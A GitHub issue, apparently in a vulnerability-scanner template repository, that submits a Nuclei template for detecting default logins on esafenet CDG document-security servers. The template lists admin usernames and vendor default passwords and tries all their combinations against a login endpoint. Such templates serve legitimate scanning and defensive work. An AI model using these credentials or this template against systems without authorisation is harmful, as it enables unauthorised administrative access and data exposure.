### ISSUE TITLE
add esafenet-CDG-weak-login

### ISSUE THREAD

**Issue by chesterblue** [projectdiscovery/nuclei-templates#7094]
### Template Information:

esafenet electronic document security management system (abbreviation: CDG) is an electronic document security encryption software.CDG contains a default login vulnerability.Attackers can enter the background through the default password to obtain database configuration information, AD domain configuration, mail configuration, information synchronization and other operations.

https://www.cnvd.org.cn/flaw/show/CNVD-2019-18223

### Nuclei Template:

```yaml
id: esafenet-cdg-weak-login

info:
  name: esafenet - CDG - Default Login
  author: chesterblue
  severity: high
  description: |
    esafenet electronic document security management system (abbreviation: CDG) is an electronic document security encryption software.CDG contains a default login vulnerability.
  tags: esafenet,CDG,default-login

requests:
  - method: POST
    path:
      - "{{BaseURL}}/CDGServer3/SystemConfig"
    headers:
      content-type: application/x-www-form-urlencoded
    body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"

    attack: clusterbomb
    payloads:
      username:
        - "systemadmin"
        - "configadmin"
        - "secadmin"
        - "docadmin"
      password:
        - "Est@Spc820"
        - "12345678"
        - "123456"
        - "Est@Spc2018"
        - "Est@Spc2019"
        - "Est@Spc2020"
        - "Est@Spc2021"
        - "Est@Spc2022"

    matchers-condition: and
    matchers:
      - type: regex
        regex: 
          - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
        part: body

      - type: status
        status:
          - 200
```

![image](https://user-images.githubusercontent.com/38368702/233261625-91b89638-1c44-4401-b6c5-e6a6e9303c10.png)
